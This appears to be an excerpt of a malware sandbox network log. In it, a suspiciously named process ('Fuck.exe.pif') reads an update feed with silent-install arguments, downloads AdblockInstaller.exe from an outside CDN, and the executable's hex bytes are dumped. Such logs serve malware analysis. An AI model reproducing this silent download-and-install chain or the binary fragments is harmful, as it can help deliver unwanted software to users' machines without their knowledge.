                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16599INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0d 0a 3c 72 73 73 20 78 6d 6c 6e 73 3a 73 70 61 72 6b 6c 65 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 64 79 6d 61 74 75 73 63 68 61 6b 2e 6f 72 67 2f 78 6d 6c 2d 6e 61 6d 65 73 70 61 63 65 73 2f 73 70 61 72 6b 6c 65 22 20 76 65 72 73 69 6f 6e 3d 22 32 2e 30 22 3e 0d 0a 20 20 20 20 3c 63 68 61 6e 6e 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 64 62 6c 6f 63 6b 20 46 61 73 74 20 66 6f 72 20 57 69 6e 64 6f 77 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 3e 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6d 70 75 74 65 77 61 6c 6c 2e 63 6f 6d 2f 61 64 62 6c 6f 63 6b 66 61 73 74 2f 6d 61 72
                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="ISO-8859-1"?><rss xmlns:sparkle="http://www.andymatuschak.org/xml-namespaces/sparkle" version="2.0"> <channel> <title>Adblock Fast for Windows</title> <link>https://cdn.computewall.com/adblockfast/mar
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16600INData Raw: 73 70 61 72 6b 6c 65 3a 76 65 72 73 69 6f 6e 3d 22 30 2e 33 2e 32 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 6e 67 74 68 3d 22 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 72 6b 6c 65 3a 6f 73 3d 22 77 69 6e 64 6f 77 73 2d 36 34 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 72 6b 6c 65 3a 69 6e 73 74 61 6c 6c 65 72 41 72 67 75 6d 65 6e 74 73 3d 22 2f 53 50 2d 20 2f 56 45 52 59 53 49 4c 45 4e 54 20 2f 4e 4f 49 43 4f 4e 53 20 2f 53 55 50 50 52 45 53 53 4d 53 47 42 4f 58 45 53 20 2f 55 50 44 41 54 45 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                    Data Ascii: sparkle:version="0.3.2" length="0" type="application/octet-stream" sparkle:os="windows-64" sparkle:installerArguments="/SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE"


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    22192.168.11.2049887172.67.68.80443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16600OUTGET /adblockfast/marketator/windows-0.3.2/AdblockInstaller.exe HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Adblock/0.2.3 WinSparkle/0.7.0 (Win64)
                                                                                                                                                                                                                                    Host: cdn.computewall.com
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16601INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:13 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                                                                    Content-Length: 16421784
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    x-amz-id-2: mzose3zaqQXfmLIHy+yvEWpNVGNSuWyVNaORuA0j4Aa/iHR0gPDSrWo0sOOU6QQoLrq0I/5NyDI=
                                                                                                                                                                                                                                    x-amz-request-id: PHJ96WEP4B59YT3F
                                                                                                                                                                                                                                    Last-Modified: Fri, 16 Sep 2022 13:29:37 GMT
                                                                                                                                                                                                                                    ETag: "8d7db88f1fb9c7308f7368ae65e3f0ef"
                                                                                                                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                    Age: 2902
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I7TEQA%2F5QeduU1TeItsJTEO%2BPZTDlwSIlRP68CdRiOwHY4xcP0CT4O0aigUpjuBLcjve7GSYFxQkEc%2BuFRmInHhXNXdHqDg%2F95BxXOzP4JnQk8Y5PuhpgNNB6gFVnHwwYwZKFek%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b6a634a4a9a30-FRA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16601INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16602INData Raw: 78 74 00 00 88 16 00 00 00 50 0b 00 00 18 00 00 00 3e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 37 00 00 00 70 0b 00 00 38 00 00 00 56 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 6d 00 00 00 b0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 dc 0f 00 00 00 20 0c 00 00 10 00 00 00 8e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 30 0c 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9a 00 00 00 00 40 0c 00 00 02 00 00 00 a0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 18 00 00 00 00 50 0c 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: xtP> `.data7p8V@.bssm.idata @.didata0@.edata@@@.tlsP
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16603INData Raw: 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 05 00 0b f4 ca 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 18 7c 4b 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 18 7c 4b 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 18 7c 4b 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74 61 02 00 00 00 10 40 00 09 42 69 67 45 6e 64 69 61 6e 02 00 02 00 09 18 7c 4b 00 06 43 72 65 61 74 65 00 00 40 13 40 00 03 16 b4 10 40 00 04 44 61 74 61 02 00 00 e4 10 40 00 0b 41 53 74 61 72 74 49 6e 64 65 78 02 00 00 00 10 40 00 09
                                                                                                                                                                                                                                    Data Ascii: D3D4@&op_Equality@@@Left@@Right|K&op_Inequality@@@Left@@Right|KEmpty@@|KCreate@@Data@BigEndian|KCreate@@@Data@AStartIndex@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16605INData Raw: 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 5c 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 88 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 4c 5d 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 18 7c 4b 00 09 43 6c 61 73 73 54 79 70 65 03 00 14 13 40 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 34 00 e8 5b 40 00 09 43 6c 61 73 73 4e 61 6d 65 03 00 b8 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 b8 12 40 00 01 00 01 01 02 00 02 00 39 00 00 5c 40 00 0b 43 6c 61 73 73 4e 61 6d 65 49 73
                                                                                                                                                                                                                                    Data Ascii: DisposeOf@Self>\@InitInstance@Self@Instance/L]@CleanupInstance@Self)|KClassType@@Self4[@ClassName@Self@@9\@ClassNameIs
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16606INData Raw: 2c 60 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 30 60 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 34 60 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 28 60 40 00 0e 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 03 00 00 00 00 00 08 00 02 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 2b 00 88 5c 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 88 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66
                                                                                                                                                                                                                                    Data Ascii: ,`@AfterConstruction@Self10`@BeforeDestruction@Self94`@Dispatch@SelfMessage?(`@DefaultHandler@SelfMessage+\@NewInstance@Self
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16607INData Raw: 8c 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 64 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 f4 23 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53 70 69 6e 4c 6f 63 6b 04 00 00 00 00 00 00 00 00 01 00 00 00 9c 10 40 00 00 00 00 00 00 05 46 4c 6f 63 6b 02 00 02 00 02 00 08 e0 63 40 00 05 45 6e 74 65 72 00 00 00 00 00 00 00 02 00 08 0c 64 40 00 04 45 78 69 74 00 00 00 00 00 00 00 02 00 00 00 00 58 24 40 00 0e 08 54 4d 6f 6e 69 74 6f 72 1c 00 00 00 00 00 00 00 00 07 00 00 00 9c 10 40 00 00 00 00 00 00 0a 46 4c 6f 63 6b 43 6f 75 6e 74 0c 00 f8 21
                                                                                                                                                                                                                                    Data Ascii: #@TMonitor.TWaitingThreadd#@Next@Thread@WaitEvent#@TMonitor.TSpinLock@FLockc@Enterd@ExitX$@TMonitor@FLockCount!
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16609INData Raw: 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 f4 27 40 00 88 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 0f 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 c5 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 38 29 40 00 14 0c 50 53 68 6f 72 74 53 74 72 69 6e 67 e4 11 40 00 02 00 50 29 40 00 0a 0a 55 54 46 38 53 74 72 69 6e 67 e9 fd 02 00 64 29 40 00 0a 0d 52 61 77 42 79 74 65 53 74 72 69 6e 67 ff ff 02 00 00 7c 29 40 00 14 05 50 42 79 74 65 b4 10 40 00 02 00 00 00 00 90 29 40 00 14 06 50 49 6e 74 36 34 14 11 40 00 02 00 00 00 a4 29 40 00 14 09 50 45 78 74 65 6e 64 65 64 9c 11 40 00 02 00 00 00 00 bc 29 40 00 14 09 50 43 75 72 72 65 6e 63 79 d0 11 40 00 02 00 00 00 00 d4 29 40 00 14 08 50 56 61 72 69 61 6e 74 f0 12
                                                                                                                                                                                                                                    Data Ascii: terfacedObject'@@System)@@@RefCount8)@PShortString@P)@UTF8Stringd)@RawByteString|)@PByte@)@PInt64@)@PExtended@)@PCurrency@)@PVariant
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16610INData Raw: 09 74 6b 49 6e 74 65 67 65 72 06 74 6b 43 68 61 72 0d 74 6b 45 6e 75 6d 65 72 61 74 69 6f 6e 07 74 6b 46 6c 6f 61 74 08 74 6b 53 74 72 69 6e 67 05 74 6b 53 65 74 07 74 6b 43 6c 61 73 73 08 74 6b 4d 65 74 68 6f 64 07 74 6b 57 43 68 61 72 09 74 6b 4c 53 74 72 69 6e 67 09 74 6b 57 53 74 72 69 6e 67 09 74 6b 56 61 72 69 61 6e 74 07 74 6b 41 72 72 61 79 08 74 6b 52 65 63 6f 72 64 0b 74 6b 49 6e 74 65 72 66 61 63 65 07 74 6b 49 6e 74 36 34 0a 74 6b 44 79 6e 41 72 72 61 79 09 74 6b 55 53 74 72 69 6e 67 0a 74 6b 43 6c 61 73 73 52 65 66 09 74 6b 50 6f 69 6e 74 65 72 0b 74 6b 50 72 6f 63 65 64 75 72 65 09 74 6b 4d 52 65 63 6f 72 64 06 53 79 73 74 65 6d 02 00 00 00 00 1c 2f 40 00 0e 07 54 56 61 72 52 65 63 08 00 00 00 00 00 00 00 00 14 00 00 00 9c 10 40 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: tkIntegertkChartkEnumerationtkFloattkStringtkSettkClasstkMethodtkWChartkLStringtkWStringtkVarianttkArraytkRecordtkInterfacetkInt64tkDynArraytkUStringtkClassReftkPointertkProceduretkMRecordSystem/@TVarRec@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16611INData Raw: 63 69 61 6c 01 00 00 00 00 08 00 00 00 84 33 40 00 06 66 73 5a 65 72 6f 07 66 73 4e 5a 65 72 6f 0a 66 73 44 65 6e 6f 72 6d 61 6c 0b 66 73 4e 44 65 6e 6f 72 6d 61 6c 0a 66 73 50 6f 73 69 74 69 76 65 0a 66 73 4e 65 67 61 74 69 76 65 05 66 73 49 6e 66 06 66 73 4e 49 6e 66 05 66 73 4e 61 4e 06 53 79 73 74 65 6d 02 00 00 34 40 00 0e 0e 54 45 78 74 65 6e 64 65 64 38 30 52 65 63 0a 00 00 00 00 00 00 00 00 01 00 00 00 9c 11 40 00 00 00 00 00 00 0b 61 45 78 74 65 6e 64 65 64 38 30 02 00 02 00 07 00 08 18 7c 4b 00 08 45 78 70 6f 6e 65 6e 74 00 00 9c 10 40 00 00 02 00 08 18 7c 4b 00 08 46 72 61 63 74 69 6f 6e 00 00 9c 11 40 00 00 02 00 08 18 7c 4b 00 08 4d 61 6e 74 69 73 73 61 00 00 34 11 40 00 00 02 00 08 18 7c 4b 00 0b 53 70 65 63 69 61 6c 54 79 70 65 00 00 84 33
                                                                                                                                                                                                                                    Data Ascii: cial3@fsZerofsNZerofsDenormalfsNDenormalfsPositivefsNegativefsInffsNInffsNaNSystem4@TExtended80Rec@aExtended80|KExponent@|KFraction@|KMantissa4@|KSpecialType3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16613INData Raw: 00 00 00 00 20 62 79 74 65 73 3a 20 00 00 00 00 55 6e 6b 6e 6f 77 6e 00 41 6e 73 69 53 74 72 69 6e 67 00 00 55 6e 69 63 6f 64 65 53 74 72 69 6e 67 00 00 00 0d 0a 00 00 55 6e 65 78 70 65 63 74 65 64 20 4d 65 6d 6f 72 79 20 4c 65 61 6b 00 00 8b 08 89 0a 8b 48 04 8b 40 08 89 4a 04 89 42 08 c3 8d 40 00 8b 08 89 0a 8b 48 04 89 4a 04 8b 48 08 89 4a 08 8b 48 0c 8b 40 10 89 4a 0c 89 42 10 c3 8d 40 00 8b 08 89 0a 8b 48 04 89 4a 04 8b 48 08 89 4a 08 8b 48 0c 89 4a 0c 8b 48 10 89 4a 10 8b 48 14 8b 40 18 89 4a 14 89 42 18 c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 8b 48 20 89 4a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 8b 48 28 89 4a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18
                                                                                                                                                                                                                                    Data Ascii: bytes: UnknownAnsiStringUnicodeStringUnexpected Memory LeakH@JB@HJHJH@JB@HJHJHJHJH@JB@(hhhH J zzz:@(hhhh H(J(z zzz:(hhh
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16614INData Raw: 44 24 0c 50 e8 ee f9 ff ff 85 c0 74 15 8b c7 83 e8 10 89 70 08 03 58 0c 83 cb 08 89 58 0c 8b df eb 77 8b c5 e8 7a 00 00 00 8b d8 85 db 74 6a 81 fd 2c 0a 04 00 76 08 8b c3 83 e8 10 89 70 08 8b c7 83 e8 10 8b 40 08 8b d3 8b cf 91 e8 de fb ff ff 8b c7 e8 cf 03 00 00 eb 3f d1 eb 3b f3 72 0a 8b df 83 ef 10 89 77 08 eb 2f 8b c6 e8 32 00 00 00 8b d8 85 db 74 22 81 fe 2c 0a 04 00 76 08 8b c7 83 e8 10 89 70 08 8b d3 8b c7 8b ce e8 cd fb ff ff 8b c7 e8 8e 03 00 00 8b c3 83 c4 20 5d 5f 5e 5b c3 8d 50 03 c1 ea 03 3d 2c 0a 00 00 53 8a 0d 59 b0 4b 00 0f 87 48 02 00 00 84 c9 0f b6 82 90 b9 4b 00 8d 1c c5 80 70 4b 00 75 56 8b 53 08 8b 42 10 b9 f8 ff ff ff 39 da 74 17 83 42 14 01 23 48 fc 89 4a 10 89 50 fc 74 28 c6 03 00 5b c3 90 90 90 8b 53 18 0f b7 4b 02 01 c1 3b 43 14
                                                                                                                                                                                                                                    Data Ascii: D$PtpXXwztj,vp@?;rw/2t",vp ]_^[P=,SYKHKpKuVSB9tB#HJPt([SK;C
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16615INData Raw: 03 89 46 fc 89 5c 33 f8 89 f0 89 da e8 51 f7 ff ff c6 05 e8 ba 4b 00 00 31 c0 5e 5b c3 90 8d 04 33 83 e1 f0 01 cb 81 f9 30 0b 00 00 72 c2 e8 ef f6 ff ff eb bb 90 8b 4e f8 29 ce 01 cb 81 f9 30 0b 00 00 72 b1 89 f0 e8 d6 f6 ff ff eb a8 81 3d f0 ba 4b 00 e0 ff 13 00 75 2c 83 ee 10 8b 06 8b 56 04 89 50 04 89 02 c6 05 e8 ba 4b 00 00 68 00 80 00 00 6a 00 56 e8 2b f4 ff ff 83 f8 01 19 c0 5e 5b c3 90 90 90 8d 9e e0 ff 13 00 e8 31 f7 ff ff c7 43 fc 02 00 00 00 c7 05 f0 ba 4b 00 e0 ff 13 00 89 1d ec ba 4b 00 c6 05 e8 ba 4b 00 00 31 c0 5e 5b c3 90 90 5b f6 c2 03 0f 84 9a f8 ff ff b8 ff ff ff ff c3 8b 48 fc f6 c1 07 53 56 89 c6 0f 85 88 00 00 00 8b 19 0f b7 4b 02 83 e9 04 39 d1 72 37 8d 1c 95 40 00 00 00 39 cb 72 04 5e 5b c3 90 89 d3 89 d0 e8 4f fa ff ff 85 c0 74 16
                                                                                                                                                                                                                                    Data Ascii: F\3QK1^[30rN)0r=Ku,VPKhjV+^[1CKKK1^[[HSVK9r7@9r^[Ot
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16617INData Raw: 2b f8 46 8b d7 80 c2 30 b8 14 00 00 00 2b c6 88 14 04 85 db 75 d4 8b d5 8d 04 04 8b ce e8 9b 0c 00 00 8d 04 2e 83 c4 14 5d 5f 5e 5b c3 53 56 8b f1 8b da 8b d3 8b ce e8 81 0c 00 00 8b c3 03 c6 5e 5b c3 8b c0 53 8b da 85 c0 74 12 83 c0 c8 8b 00 0f b6 08 40 8b d3 e8 d1 ff ff ff 5b c3 a1 6c 70 4b 00 e8 91 35 00 00 8b c8 8b d3 a1 6c 70 4b 00 e8 b7 ff ff ff 5b c3 90 55 8b ec 53 8b d0 81 fa ff ff 00 00 76 65 f6 c2 03 75 60 8b 55 08 8b 52 e4 8b c8 3b d1 77 0d 8b 5d 08 03 53 f0 83 c1 04 3b d1 73 17 8b 55 08 33 c9 89 4a f0 6a 1c 8b 55 08 83 c2 e4 52 50 e8 0d ee ff ff 8b 45 08 83 78 f0 04 72 1e 8b 45 08 81 78 f4 00 10 00 00 75 12 8b 45 08 f6 40 f8 f6 74 09 8b 45 08 f6 40 f9 01 74 04 33 c0 eb 07 b0 01 5b 5d c3 33 c0 5b 5d c3 55 8b ec 53 56 57 8b fa 8b d8 81 ff e8 03
                                                                                                                                                                                                                                    Data Ascii: +F0+u.]_^[SV^[St@[lpK5lpK[USveu`UR;w]S;sU3JjURPExrExuE@tE@t3[]3[]USVW
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16618INData Raw: 85 72 ff ff ff 8b 1d 80 db 4b 00 eb 37 8b c3 83 c0 10 e8 dd fc ff ff 84 c0 75 26 c6 85 ff 47 fe ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8 47 fe ff 89 b4 85 dc 07 fe ff ff 85 f8 47 fe ff 8b 5b 04 81 fb 7c db 4b 00 74 0c 81 bd f8 47 fe ff 00 10 00 00 7c b5 80 bd ff 47 fe ff 00 0f 85 a6 02 00 00 c6 85 f7 47 fe ff 00 33 c0 89 85 e8 47 fe ff a1 5c 70 4b 00 e8 22 30 00 00 8b c8 8d 95 dc 87 fd ff a1 5c 70 4b 00 e8 44 fa ff ff 8b d8 c7 85 f0 47 fe ff 37 00 00 00 c7 85 e0 47 fe ff 82 70 4b 00 8d 85 fc 4f fe ff 89 85 dc 47 fe ff 8b 85 e0 47 fe ff 0f b7 00 83 e8 04 89 85 e4 47 fe ff c6 85 f6 47 fe ff 00 bf ff 00 00 00 8b 85 dc 47 fe ff 8b f0 8d 85 db ff fd ff 3b d8 0f 87 2c 01 00 00 83 3e 00 0f 86 16 01 00 00 80 bd f7 47 fe ff 00 75 21 a1 60 70 4b 00 e8 9e
                                                                                                                                                                                                                                    Data Ascii: rK7u&GsGG[|KtG|GG3G\pK"0\pKDG7GpKOGGGGG;,>Gu!`pK
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16619INData Raw: ab f9 ff ff 83 3d 8c db 4b 00 00 74 19 68 00 80 00 00 6a 00 a1 8c db 4b 00 50 e8 7c e4 ff ff 33 c0 a3 8c db 4b 00 e8 00 ff ff ff c3 8d 40 00 85 c0 74 0a ff 15 6c 77 4b 00 85 c0 74 02 f3 c3 b0 01 e9 5d 01 00 00 c3 85 c0 7e 13 ff 15 60 77 4b 00 85 c0 74 02 f3 c3 b0 01 e9 45 01 00 00 31 c0 f3 c3 90 85 c0 74 0a ff 15 64 77 4b 00 85 c0 75 02 f3 c3 b0 02 e9 29 01 00 00 c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 68 77 4b 00 59 09 c0 74 19 89 01 c3 b0 02 e9 06 01 00 00 89 10 89 c8 ff 15 64 77 4b 00 09 c0 75 eb c3 b0 01 e9 f0 00 00 00 85 d2 74 10 50 89 d0 ff 15 60 77 4b 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 e7 77 00 00 83 b8 00 00 00 00 00 74 0f e8 d9 77 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 c7 77 00 00 83 b8 00 00 00 00 00 74 0f e8 b9 77 00 00 8b
                                                                                                                                                                                                                                    Data Ascii: =KthjKP|3K@tlwKt]~`wKtE1tdwKu)t2tPhwKYtdwKutP`wKYt@wtw@3wtw
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16621INData Raw: 66 89 48 0c 66 89 48 0a 66 89 48 08 66 89 48 06 66 89 48 04 66 89 48 02 66 89 08 c3 c3 90 53 56 57 89 c6 50 85 c0 0f 84 83 00 00 00 31 c0 31 db bf cc cc cc 0c 66 8b 1e 83 c6 02 66 83 fb 20 74 f4 b5 00 66 83 fb 2d 74 76 66 83 fb 2b 74 72 66 83 fb 24 74 74 66 83 fb 78 74 6e 66 83 fb 58 74 68 66 83 fb 30 75 19 66 8b 1e 83 c6 02 66 83 fb 78 74 56 66 83 fb 58 74 50 66 85 db 74 27 eb 05 66 85 db 74 35 66 83 eb 30 66 83 fb 09 77 2b 39 f8 77 27 8d 04 80 01 c0 01 d8 66 8b 1e 83 c6 02 66 85 db 75 e0 fe cd 74 0b 85 c0 7d 68 eb 0b 83 c6 02 eb 06 f7 d8 7e 5d 78 5b 5b 29 de eb 59 fe c5 66 8b 1e 83 c6 02 eb 86 bf ff ff ff 0f 66 8b 1e 83 c6 02 66 85 db 74 d6 66 83 fb 61 72 04 66 83 eb 20 66 83 eb 30 66 83 fb 09 76 0e 66 83 eb 11 66 83 fb 05 77 c3 66 83 c3 0a 39 f8 77 bb
                                                                                                                                                                                                                                    Data Ascii: fHfHfHfHfHfHfSVWP11ff tf-tvf+trf$ttfxtnfXthf0uffxtVfXtPft'ft5f0fw+9w'ffut}h~]x[[)Yffftfarf f0fvffwf9w
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16622INData Raw: 00 eb f0 8b c3 5f 5e 5b 59 59 5d c3 90 53 56 89 c3 8b 43 ac 85 c0 74 29 8b 08 83 c0 04 8b 32 3b 30 75 18 8b 72 04 3b 70 04 75 10 8b 72 08 3b 70 08 75 08 8b 72 0c 3b 70 0c 74 13 83 c0 1c 49 75 dc 8b 5b d0 85 db 74 04 8b 1b eb c5 31 c0 5e 5b c3 53 56 81 c4 00 ff ff ff 8b f2 e8 49 01 00 00 85 c0 74 5e 8b d0 8b ca 83 c1 02 42 0f b6 02 03 c8 8d 59 0a 80 7b 01 40 74 0b 8b d6 8b c3 e8 ae 6a 00 00 eb 44 54 8d 44 24 04 66 ba 3a 00 b9 ff 00 00 00 e8 9d 25 00 00 8d 44 24 04 8b d3 b9 01 00 00 00 e8 05 2b 00 00 8b d0 42 8b c3 b9 ff ff ff 7f e8 a6 21 00 00 8b c4 8b d6 e8 71 6a 00 00 eb 07 8b c6 e8 fc 1a 00 00 81 c4 00 01 00 00 5e 5b c3 8d 40 00 53 56 8b f2 8b d8 85 db 74 0d 8b 03 8b d6 e8 ad 00 00 00 84 c0 75 05 33 c0 5e 5b c3 b0 01 5e 5b c3 8d 40 00 55 8b ec 51 53 56
                                                                                                                                                                                                                                    Data Ascii: _^[YY]SVCt)2;0ur;pur;pur;ptIu[t1^[SVIt^BY{@tjDTD$f:%D$+B!qj^[@SVtu3^[^[@UQSV
